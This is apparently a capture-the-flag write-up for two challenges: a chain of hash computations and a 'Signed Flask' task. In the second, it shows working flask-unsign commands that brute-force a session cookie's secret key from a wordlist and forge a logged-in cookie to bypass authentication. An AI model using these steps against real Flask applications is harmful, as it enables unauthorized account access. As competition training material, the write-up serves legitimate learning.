we have to follow the instructions
the md5 sum for “CSCTF” is 542dc648d5c62e61bd1f30a63b1c6dbe
we put that into ctf.txt
to calculate the sha256 hash of the file we use sha256
. we get 3c2d667f257c3d1ddeba049fe1f723cec9a0de6c438d744285d24cbd81a897d1
to crack the hash we can use an online database that checks the hash if it has been cracked previously. we get #winner
. the sha1 hash of this is 22124982b891828006f9d759f32a8b01352c70df
. we put that on a new line inside ctf.txt
and get 7602e0234d40319989e8c1c14349403b1fba145ee081322b04115e85b7197db1fa0e318dd9715ce7fa5518e8f9bc4af2e2a4b399fb6604292590734cbbce4ab6
easy, right?
Signed Flask
based on the description we have to crack the session
cookie found on the site such that we cand sign with the same password a {'logged_in': True}
cookie to feed back into the browser. we do as follows:
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie "eyJsb2dnZWRfaW4iOmZhbHNlfQ.ZgjXBQ.xY8gCZc84swJmK7IadguxeQuWYo" --no-literal-eval
[*] Session decodes to: {'logged_in': False}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 2171264 attemptscas
the password is 98765432123456789
. we can then sign a new cookie with this password:
flask-unsign --sign --cookie "{'logged_in': True}" --secret "98765432123456789" --no-literal-eval
replacing this in the browser we have broke in :)
but to remember all we had to do was to get the SECRET_KEY
and that is 98765432123456789
check out the next section WEB